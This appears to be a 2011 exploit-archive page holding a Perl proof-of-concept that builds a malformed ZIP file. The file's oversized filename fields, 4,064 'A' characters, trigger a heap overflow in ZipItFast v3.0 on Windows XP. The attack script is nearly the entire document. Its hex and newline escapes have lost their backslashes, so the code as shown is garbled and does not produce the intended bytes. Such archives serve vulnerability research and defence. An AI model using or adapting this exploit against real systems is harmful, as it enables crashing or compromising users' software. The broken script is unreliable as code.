ZipItFast v3.0 .ZIP File Heap Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ZipItFast v3.0 .ZIP File Heap Overflow Exploit
# Published : 2011-07-08
# Author :
# Previous Title : Donar Player 2.8.0 Denial of Service Vulnerability
# Next Title : Cogent DataHub <= 7.1.1.63 Stack Overflow

#!/usr/bin/perl
#
#[+]Exploit Title: ZipItFast v3.0 .ZIP File Heap Overflow Exploit
#[+]Date: 0872011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freewarefiles.com/ZipItFast---Zip-It-Free-V_program_22803.html
#[+]Version: v3.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#

use strict;
use warnings;

my $filename = "Exploit.zip"; 

print "nnttZipItFast v3.0 .ZIP File Heap Overflow Exploitn";
print "ttCreated by C4SS!0 G0M3Sn";
print "ttE-mail Louredo_@hotmail.comn";
print "ttSite www.exploit-br.org/nn";
sleep(2);

my $head = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

my $head2 = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $head3 = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";


my $payload = "A" x 4064;

$payload = $payload.".txt";
my $zip = $head.$payload.$head2.$payload.$head3;
open(FILE,">$filename") || die "[-]Error:n$!n";
print FILE $zip;
close(FILE);
print "[+] ZIP File Created With Sucess:)n";
sleep(1);